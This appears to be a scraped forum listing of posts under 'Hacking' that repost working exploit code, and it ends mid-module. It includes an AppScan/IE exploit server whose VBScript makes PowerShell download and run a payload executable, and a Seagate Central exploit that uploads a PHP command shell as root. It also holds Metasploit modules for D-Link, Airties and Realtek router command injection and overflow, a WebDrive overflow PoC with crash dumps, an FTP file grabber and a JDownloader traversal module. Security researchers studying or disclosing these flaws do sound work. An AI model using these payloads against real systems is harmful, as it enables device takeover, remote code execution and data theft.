following proof-of-concept connects to the given FTP server and # downloads all files stored in the "Camera Roll" folder without providing a # username or password: import sys from ftplib import FTP if len(sys.argv) <= 1: print "Usage: ./ftp-nologin.py [host] [port]" exit() host = sys.argv[1] port = int(sys.argv[2]) files = [] def append_file(s): files.append(s.split(' ')[-1]) blocks = [] def get_blocks(d): blocks.append(d) ftp = FTP() print ftp.connect(host, port) ftp.set_pasv(1) ftp.cwd("Camera Roll") print ftp.retrlines('LIST', append_file) files.pop(0) for filename in files: print "Downloading %s..." % filename ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks) f = open(filename, 'wb') for block in blocks: f.write(block) f.close() print "[+] File saved to: %s" % filename blocks = [] ftp.quit()
  7. #!/usr/bin/python import BaseHTTPServer, socket ## # IBM Security AppScan Standard OLE Automation Array Remote Code Execution # # Author: Naser Farhadi # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 # # Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7 # # Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ # if you able to exploit IE then you can exploit appscan and acunetix ;) # This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And # Metasploit windows/shell_bind_tcp Executable Payload # # Usage: # chmod +x appscan.py # ./appscan.py # ... # nc 172.20.10.14 333 # # Video: http://youtu.be/hPs1zQaBLMU ## class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(req): req.send_response(200) if req.path == "/payload.exe": req.send_header('Content-type', 'application/exe') req.end_headers() exe = open("payload.exe", 'rb') req.wfile.write(exe.read()) exe.close() else: req.send_header('Content-type', 'text/html') req.end_headers() req.wfile.write("""Please scan me! <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe',\ 'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');" shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0 end function dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script>""") if __name__ == '__main__': sclass = BaseHTTPServer.HTTPServer server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler) print "Http server started", socket.gethostbyname(socket.gethostname()), 80 try: server.serve_forever() except KeyboardInterrupt: pass server.server_close()
  8. mohammad_ghazei

    Hacking

    #!/usr/bin/python #Exploit Title:WebDrive Buffer OverFlow PoC #Author: metacom #Vendor Homepage: http://www.webdrive.com/products/webdrive/ #Software Link: https://www.webdrive.com/products/webdrive/download/ #Version: 12.2 (build # 4172) 32 bit #Date found: 31.05.2015 #Date published: 31.05.2015 #Platform: Windows 7 Ultimate #Bug: Multiple Buffer Overflow UNICODE ''' ---------------------------------------------------------------------------- Summary: Unlike a typical FTP client, WebDrive allows you to open and edit server-based, files without the additional step of downloading the file. Using a simple wizard, you assign a network drive letter to the FTP Server. WebDrive supports additional protocols such as WebDAV, SFTP and Amazon S3 and maps a drive letter to each of these servers.You can map unique drive letters to multiple servers.Download the full-function 20-day trial of WebDrive and make file management on remote servers easier and more efficient! ------------------------------------------------------------------------------ WebDrive connects to many types of web servers, as well as servers in the cloud.You can use WebDrive to access your files on all of the following server types and protocols: WebDAV ------------>Vulnerable WebDAV over SSL---->Vulnerable FTP---------------->Vulnerable FTP over SSL------->Vulnerable Amazon S3---------->Vulnerable SFTP--------------->Vulnerable FrontPage Server--->Vulnerable ------------------------------------------------------------------------------ How to Crash: Copy the AAAA...string from WebDrive.txt to clipboard, create a connection and paste it in the URL/Address and attempt to connect. WebDAV ============================ Crash Analysis using WinDBG: ============================ (430.9f8): Access violation - code c0000005 (!!! second chance !!!) eax=001cad5c ebx=02283af8 ecx=00000041 edx=02289d9c esi=fdf47264 edi=001cad5c eip=0055ff2b esp=001c8cfc ebp=001c8d00 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe webdrive+0x30ff2b: 0055ff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:001d1000=???? 0:000> !exchain 001c8d20: webdrive+35a24e (005aa24e) 001cb768: webdrive+1c0041 (00410041) Invalid exception stack at 00410041 0:000> d 001cb768 001cb768 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb778 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb788 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb798 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb7a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb7b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb7c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb7d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. WebDAV over SSL ============================ Crash Analysis using WinDBG: ============================ (b88.ca0): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=00000000 ecx=00410041 edx=775e660d esi=00000000 edi=00000000 eip=00410041 esp=000a1238 ebp=000a1258 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\ipworks9.dll - ipworks9!IPWorks_SNPP_Get+0x57f: 00410041 038d4df0e8da add ecx,dword ptr [ebp-25170FB3h] ss:0023:daf302a5=???????? 0:000>!exchain Invalid exception stack at 00410041 FTP and FTP over SSL ============================ Crash Analysis using WinDBG: ============================ (834.70c): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002d84f0 edi=00000000 eip=775e64f4 esp=002d8488 ebp=002d84dc iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 ntdll!KiFastSystemCallRet: 775e64f4 c3 ret 0:000> !exchain 002d8c1c: webdrive+35a24e (015da24e) 002db664: 00410041 Invalid exception stack at 00410041 Amazon S3 ============================ Crash Analysis using WinDBG: ============================ (a64.a98): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002f8550 edi=00000000 eip=775e64f4 esp=002f84e8 ebp=002f853c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 ntdll!KiFastSystemCallRet: 775e64f4 c3 ret 0:000> !exchain 002f8c7c: webdrive+35a24e (015da24e) 002fb6c4: 00410041 Invalid exception stack at 00410041 SFTP ============================ Crash Analysis using WinDBG: ============================ (848.9a8): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002380f8 edi=00000000 eip=775e64f4 esp=00238090 ebp=002380e4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 ntdll!KiFastSystemCallRet: 775e64f4 c3 ret 0:000> !exchain 00238824: webdrive+35a24e (015da24e) 0023b26c: 00410041 Invalid exception stack at 00410041 FrontPage Server ============================ Crash Analysis using WinDBG: ============================ (cd4.710): Access violation - code c0000005 (!!! second chance !!!) eax=007ba9f0 ebx=05d29738 ecx=00000041 edx=05d2fd48 esi=faa912b8 edi=007ba9f0 eip=003bff2b esp=007b8990 ebp=007b8994 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe webdrive+0x30ff2b: 003bff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:007c1000=???? 0:000> !exchain 007b89b4: webdrive+35a24e (0040a24e) 007bb3fc: webdrive+360041 (00410041) Invalid exception stack at 00410041 ''' #Proof of Concept: buffer="http://" buffer+="\x41" * 70000 off=buffer try: out_file = open("WebDrive.txt",'w') out_file.write(off) out_file.close() print("[*] Malicious txt file created successfully") except: print "[!] Error creating file"
  9. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices HNAP SOAPAction-Header Command Execution', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on a DIR-645 device. The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR }, 'Author' => [ 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645 'Craig Heffner', # independent Vulnerability discovery on different other routers 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'], ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'] ], 'DisclosureDate' => 'Feb 13 2015', 'Privileged' => true, 'Platform' => 'linux', 'Targets' => [ [ 'MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target { 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR') end def check uri = '/HNAP1/' soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }) if res && [200].include?(res.code) && res.body =~ /D-Link/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavour => :echo, :linemax => 200, :temp => '' ) end def execute_command(cmd, opts) uri = '/HNAP1/' # we can not use / in our command so we need to use a little trick cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end
  10. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Airties login-cgi Buffer Overflow', 'Description' => %q{ This module exploits a remote buffer overflow vulnerability on several Airties routers. The vulnerability exists in the handling of HTTP queries to the login cgi with long redirect parametres. The vulnerability doesn't require authentication. This module has been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation. Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable. }, 'Author' => [ 'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'Arch' => ARCH_MIPSBE, 'References' => [ ['EDB', '36577'], ['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC ], 'Targets' => [ [ 'AirTies_Air5650v3TT_FW_1.0.2.0', { 'Offset' => 359, 'LibcBase' => 0x2aad1000, 'RestoreReg' => 0x0003FE20, # restore s-registers 'System' => 0x0003edff, # address of system-1 'CalcSystem' => 0x000111EC, # calculate the correct address of system 'CallSystem' => 0x00041C10, # call our system 'PrepareSystem' => 0x000215b8 # prepare $a0 for our system call } ] ], 'DisclosureDate' => 'Mar 31 2015', 'DefaultTarget' => 0)) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR') end def check begin res = send_request_cgi({ 'uri' => '/cgi-bin/login', 'method' => 'GET' }) if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavour => :echo, :linemax => 100 ) end def prepare_shellcode(cmd) shellcode = rand_text_alpha_upper(target['Offset']) # padding shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N") # restore registers with controlled values # 0003FE20 lw $ra, 0x48+var_4($sp) # 0003FE24 lw $s7, 0x48+var_8($sp) # 0003FE28 lw $s6, 0x48+var_C($sp) # 0003FE2C lw $s5, 0x48+var_10($sp) # 0003FE30 lw $s4, 0x48+var_14($sp) # 0003FE34 lw $s3, 0x48+var_18($sp) # 0003FE38 lw $s2, 0x48+var_1C($sp) # 0003FE3C lw $s1, 0x48+var_20($sp) # 0003FE40 lw $s0, 0x48+var_24($sp) # 0003FE44 jr $ra # 0003FE48 addiu $sp, 0x48 shellcode << rand_text_alpha_upper(36) # padding shellcode << [target['LibcBase'] + target['System']].pack('N') # s0 - system address-1 shellcode << rand_text_alpha_upper(16) # unused registers $s1 - $s4 shellcode << [target['LibcBase'] + target['CallSystem']].pack('N') # $s5 - call system # 00041C10 move $t9, $s0 # 00041C14 jalr $t9 # 00041C18 nop shellcode << rand_text_alpha_upper(8) # unused registers $s6 - $s7 shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N') # write sp to $a0 -> parametre for call to system # 000215B8 addiu $a0, $sp, 0x20 # 000215BC lw $ra, 0x1C($sp) # 000215C0 jr $ra # 000215C4 addiu $sp, 0x20 shellcode << rand_text_alpha_upper(28) # padding shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N') # add 1 to s0 (calculate system address) # 000111EC move $t9, $s5 # 000111F0 jalr $t9 # 000111F4 addiu $s0, 1 shellcode << cmd end def execute_command(cmd, opts) shellcode = prepare_shellcode(cmd) begin res = send_request_cgi({ 'method' => 'POST', 'uri' => '/cgi-bin/login', 'encode_params' => false, 'vars_post' => { 'redirect' => shellcode, 'user' => rand_text_alpha(5), 'password' => rand_text_alpha(8) } }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end
  11. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include REXML def initialize(info = {}) super(update_info(info, 'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution', 'Description' => %q{ Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested successfully on a Trendnet TEW-731BR router with emulation. }, 'Author' => [ 'Ricky "HeadlessZeke" Lawshae', # Vulnerability discovery 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-8361'], ['ZDI', '15-155'], ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'], ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055'] ], 'DisclosureDate' => 'Apr 24 2015', 'Privileged' => true, 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'MIPS Little Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR') register_options( [ Opt::RPORT(52869) # port of UPnP SOAP webinterface ], self.class) end def check begin res = send_request_cgi({ 'uri' => '/picsdesc.xml' }) if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\/1.0 UPnP\/1.0/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavour => :echo, :linemax => 50, :nodelete => true ) end def execute_command(cmd, opts) uri = '/wanipcn.xml' soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping' data_cmd = '<?xml version="1.0"?>' + build_soap_req begin res = send_request_cgi({ 'uri' => uri, 'vars_get' => { 'service' => 'WANIPConn1' }, 'ctype' => 'text/xml', 'method' => 'POST', 'headers' => { 'SOAPAction' => soap_action }, 'data' => data_cmd.gsub(/CMD_HERE/, "`#{cmd.gsub(/\\/, '\\\\\\\\\\')}`") }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def build_soap_req new_external_port = rand(32767) + 32768 new_internal_port = rand(32767) + 32768 xml = Document.new xml.add_element( 'SOAP-ENV:Envelope', { 'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/', 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/' }) xml.root.add_element('SOAP-ENV:Body') body = xml.root.elements[1] body.add_element( 'm:AddPortMapping', { 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1' }) port_mapping = body.elements[1] port_mapping.add_element('NewLeaseDuration') port_mapping.add_element('NewInternalClient') port_mapping.add_element('NewEnabled') port_mapping.add_element('NewExternalPort') port_mapping.add_element('NewRemoteHost') port_mapping.add_element('NewProtocol') port_mapping.add_element('NewInternalPort') port_mapping.elements['NewLeaseDuration'].text = '' port_mapping.elements['NewInternalClient'].text = 'CMD_HERE' port_mapping.elements['NewEnabled'].text = '1' port_mapping.elements['NewExternalPort'].text = "#{new_external_port}" port_mapping.elements['NewRemoteHost'].text = '' port_mapping.elements['NewProtocol'].text = 'TCP' port_mapping.elements['NewInternalPort'].text = "#{new_internal_port}" xml.to_s end end
  12. mohammad_ghazei

    Hacking

    #!/usr/bin/python # seagate_ftp_remote_root.py # # Seagate Central Remote Root Exploit # # Jeremy Brown [jbrown3264/gmail] # May 2015 # # -Synopsis- # # Seagate Central by default has a passwordless root account (and no option to change it). # One way to exploit this is to log into it's ftp server and upload a php shell to the webroot. # From there, we can execute commands with root privileges as lighttpd is also running as root. # # -Fixes- # # Seagate scheduled it's updates to go live on April 28th, 2015. # # Tested Firmware Version: 2014.0410.0026-F # import sys from ftplib import FTP port = 21 php_shell = """ <?php if(isset($_REQUEST['cmd'])) { $cmd = ($_REQUEST["cmd"]); echo "<pre>$cmd</pre>"; system($cmd); } ?> """ php_shell_filename = "shell.php" seagate_central_webroot = "/cirrus/" def main(): if(len(sys.argv) < 2): print("Usage: %s <host>" % sys.argv[0]) return host = sys.argv[1] try: with open(php_shell_filename, 'w') as file: file.write(php_shell) except Exception as error: print("Error: %s" % error); return try: ftp = FTP(host) ftp.login("root") ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb')) ftp.close() except Exception as error: print("Error: %s" % error); return print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename)) return if __name__ == "__main__": main()
  13. mohammad_ghazei

    Hacking

    =begin # Exploit Title: JDownloader 2 Beta Directory Traversal Vulnerability (Zip Extraction) # Date: 2015-06-02 # Exploit Author: PizzaHatHacker # Vendor Homepage: http://jdownloader.org/home/index # Software Link: http://jdownloader.org/download/offline # Version: 1171 <= SVN Revision <= 2331 # Contact: PizzaHatHacker[a]gmail[.]com # Tested on: Windows XP SP3 / Windows 7 SP1 # CVE: # Category: remote 1. Product Description Extract from the official website : "JDownloader is a free, open-source download management tool with a huge community of developers that makes downloading as easy and fast as it should be. Users can start, stop or pause downloads, set bandwith limitations, auto-extract archives and much more. It's an easy-to-extend framework that can save hours of your valuable time every day!" 2. Vulnerability Description & Technical Details JDownloader 2 Beta is vulnerable to a directory traversal security issue. Class : org.appwork.utils.os.CrossSystem Method : public static String alleviatePathParts(String pathPart) This method is called with a user-provided path part as parameter, and should return a valid and safe path where to create a file/folder. This method first checks that the input filepath does not limit itself to a (potentially dangerous) sequence of dots and otherwise removes it : pathPart = pathPart.replaceFirst("\\.+$", ""); However right after this, the value returned is cleaned from starting and ending white space characters : return pathPart.trim(); Therefore, if you pass to this method a list of dots followed by some white space like ".. ", it will bypass the first check and then return the valid path ".." which is insecure. This leads to a vulnerability when JDownloader 2 Beta just downloaded a ZIP file and then tries to extract it. A ZIP file with an entry containing ".. " sequence(s) would cause JD2b to overwrite/create arbitrary files on the target filesystem. 3. Impact Analysis : To exploit this issue, the victim is required to launch a standard ZIP file download. The Unzip plugin is enabled by default in JDownloader : any ZIP file downloaded will automatically be extracted. By exploiting this issue, a malicious user may be able to create/overwrite arbitrary files on the target file system. Therefore, it is possible to take the control of the victim's machine with the rights of the JDownloader process - typically standard (non-administrator) rights - for example by overwriting existing executable files, by uploading an executable file in a user's autorun directory etc. 4. Common Vulnerability Scoring System * Exploitability Metrics - Access Vector (AV) : Network (AV:N) - Access Complexity (AC) : Medium (AC:M) - Authentication (Au) : None (Au:N) * Impact Metrics - Confidentiality Impact (C) : Partial (C:P) - Integrity Impact (I) : Partial (I:P) - Availability Impact (A) : Partial (A:P) * CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P) - CVSS Base Score : 6.8 - Impact Subscore 6.4 - Exploitability Subscore 8.6 5. Proof of Concept - Create a ZIP file with an entry like ".. /poc.txt" - Upload it to an HTTP server (for example) - Run a vulnerable revision of JDownloader 2 Beta and use it to download the file from the server - JD2b will download and extract the file, which will create a "poc.txt" one level upper from your download directory OR see the Metasploit Exploit provided. 6. Vulnerability Timeline 2012-04-27 : Vulnerability created (SVN Revision > 1170) 2014-08-19 : Vulnerability identified [...] : Sorry, I was not sure how to handle this and forgot about it for a long time 2015-05-08 : Vendor informed about this issue 2015-05-08 : Vendor response + Code modification (Revision 2332) 2015-05-11 : Code modification (SVN Revision 2333) 2015-05-11 : Notified the vendor : The vulnerable code is still exploitable via ".. .." (dot dot blank dot dot) 2015-05-12 : Code modification (SVN Revision 2335) 2015-05-12 : Confirmed to the vendor that the code looks now safe 2015-06-01 : JDownloader 2 Beta Update : Looks not vulnerable anymore 2015-06-04 : Disclosure of this document 7. Solution Update JDownloader 2 Beta to the latest version. 8. Personal Notes I am NOT a security professional, just a kiddy fan of security. I was boring so I looked for some security flaws in some software and happily found this. If you have any questions/remarks, don't hesitate to contact me by email. I'm interesting in any discussion/advice/exchange/question/criticism about security/exploits/programming :-) =end ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::WbemExec def initialize( info = {} ) super( update_info( info, 'Name' => 'JDownloader 2 Beta Directory Traversal Vulnerability', 'Description' => %q{ This module exploits a directory traversal flaw in JDownloader 2 Beta when extracting a ZIP file (which by default is automatically done by JDL). The following targets are available : Windows regular user : Create executable file in the 'Start Menu\Startup' under the user profile directory. (Executed at next session startup). Linux regular user : Create an executable file and a .profile script calling it in the user's home directory. (Executed at next session login). Windows Administrator : Create an executable file in C:\\Windows\\System32 and a .mof file calling it. (Executed instantly). Linux Administrator : Create an executable file in /etc/crontab.hourly/. (Executed within the next hour). Vulnerability date : Apr 27 2012 (SVN Revision > 1170) }, 'License' => MSF_LICENSE, 'Author' => [ 'PizzaHatHacker <PizzaHatHacker[A]gmail[.]com>' ], # Vulnerability Discovery & Metasploit module 'References' => [ [ 'URL', 'http://jdownloader.org/download/offline' ], ], 'Platform' => %w{ linux osx solaris win }, 'Payload' => { 'Space' => 20480, # Arbitrary big number 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Windows Regular User (Start Menu Startup)', { 'Platform' => 'win', 'Depth' => 0, # Go up to root (C:\Users\Joe\Downloads\..\..\..\ -> C:\) 'RelativePath' => 'Users/All Users/Microsoft/Windows/Start Menu/Programs/Startup/', 'Option' => nil, } ], [ 'Linux Regular User (.profile)', { 'Platform' => 'linux', 'Depth' => -2, # Go up 2 levels (/home/joe/Downloads/XXX/xxx.zip -> /home/joe/) 'RelativePath' => '', 'Option' => 'profile', } ], [ 'Windows Administrator User (Wbem Exec)', { 'Platform' => 'win', 'Depth' => 0, # Go up to root (n levels) 'RelativePath' => 'Windows/System32/', 'Option' => 'mof', } ], [ 'Linux Administrator User (crontab)', { 'Platform' => 'linux', 'Depth' => 0, # Go up to root (n levels) 'RelativePath' => 'etc/cron.hourly/', 'Option' => nil, } ], ], 'DefaultTarget' => nil, 'DisclosureDate' => '' )) register_options( [ OptString.new('FILENAME', [ true, 'The output file name.', '']), # C:\Users\Bob\Downloads\XXX\xxx.zip => 4 # /home/Bob/Downloads/XXX/xxx.zip => 4 OptInt.new('DEPTH', [true, 'JDownloader download directory depth. (0 = filesystem root, 1 = one subfolder under root etc.)', 4]), ], self.class) register_advanced_options( [ OptString.new('INCLUDEDIR', [ false, 'Path to an optional directory to include into the archive.', '']), ], self.class) end # Traversal path def traversal(depth) result = '.. /' if depth < 0 # Go up n levels result = result * -depth else # Go up until n-th level result = result * (datastore['DEPTH'] - depth) end return result end def exploit # Create a new archive zip = Rex::Zip::Archive.new # Optionally include an initial directory dir = datastore['INCLUDEDIR'] if not dir.nil? and not dir.empty? print_status("Filling archive recursively from path #{dir}") zip.add_r(dir) end # Create the payload executable file path exe_name = rand_text_alpha(rand(6) + 1) + (target['Platform'] == 'win' ? '.exe' : '') exe_file = traversal(target['Depth']) + target['RelativePath'] + exe_name # Generate the payload executable file content exe_content = generate_payload_exe() # Add the payload executable file into the archive zip_add_file(zip, exe_file, exe_content) # Check all available targets case 